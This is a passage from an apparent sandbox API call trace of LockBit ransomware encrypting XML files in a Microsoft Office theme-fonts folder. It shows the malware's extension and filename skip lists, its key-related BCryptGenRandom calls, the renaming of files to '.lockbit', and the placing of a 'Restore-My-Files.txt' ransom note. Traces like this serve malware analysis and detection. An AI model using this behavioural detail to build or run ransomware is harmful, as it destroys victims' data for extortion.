lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Urban.xml") returned -1 [0196.117] lstrcmpiW (lpString1="ntldr", lpString2="Urban.xml") returned -1 [0196.117] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Urban.xml") returned -1 [0196.118] lstrcmpiW (lpString1="bootsect.bak", lpString2="Urban.xml") returned -1 [0196.118] lstrcmpiW (lpString1="autorun.inf", lpString2="Urban.xml") returned -1 [0196.118] lstrcmpiW (lpString1="thumbs.db", lpString2="Urban.xml") returned -1 [0196.118] lstrcmpiW (lpString1="iconcache.db", lpString2="Urban.xml") returned -1 [0196.118] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.118] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml") returned=".xml" [0196.118] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.118] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.118] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.119] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.119] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.lockbit") returned 83 [0196.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.126] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.126] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.126] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3609) returned 1 [0196.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.127] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.127] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.130] malloc (_Size=0xbc) returned 0x1fa2ed8 [0196.130] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0196.131] free (_Block=0x1fa2ed8) [0196.131] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.131] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.131] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffaf6400, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffaf6400, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verve.xml", cAlternateFileName="")) returned 1 [0196.131] lstrcmpiW (lpString1=".", lpString2="Verve.xml") returned -1 [0196.132] lstrcmpiW (lpString1="..", lpString2="Verve.xml") returned -1 [0196.132] PathFindExtensionW (pszPath="Verve.xml") returned=".xml" [0196.132] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.132] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.133] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="ntldr", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="bootsect.bak", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="autorun.inf", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="thumbs.db", lpString2="Verve.xml") returned -1 [0196.134] lstrcmpiW (lpString1="iconcache.db", lpString2="Verve.xml") returned -1 [0196.134] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.134] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml") returned=".xml" [0196.134] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.134] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.134] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.135] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.135] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.lockbit") returned 83 [0196.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.137] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.137] malloc (_Size=0x40068) returned 0x3df0008 [0196.137] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3604) returned 1 [0196.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.138] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.144] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.144] malloc (_Size=0xbc) returned 0x1fa2ed8 [0196.144] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0196.145] free (_Block=0x1fa2ed8) [0196.145] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.145] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.146] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.146] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 1 [0196.146] lstrcmpiW (lpString1=".", lpString2="Waveform.xml") returned -1 [0196.146] lstrcmpiW (lpString1="..", lpString2="Waveform.xml") returned -1 [0196.146] PathFindExtensionW (pszPath="Waveform.xml") returned=".xml" [0196.146] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.146] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.147] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="ntldr", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="bootsect.bak", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="autorun.inf", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="thumbs.db", lpString2="Waveform.xml") returned -1 [0196.148] lstrcmpiW (lpString1="iconcache.db", lpString2="Waveform.xml") returned -1 [0196.148] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.148] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml") returned=".xml" [0196.148] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.148] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.149] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.149] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.150] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.150] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.150] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.150] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.150] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.lockbit") returned 86 [0196.150] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.151] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.151] malloc (_Size=0x40068) returned 0x3d70450 [0196.151] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3577) returned 1 [0196.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.152] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.152] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.154] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.154] malloc (_Size=0xc2) returned 0x1fa2ed8 [0196.154] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0196.160] free (_Block=0x1fa2ed8) [0196.160] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.160] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.160] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.160] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, 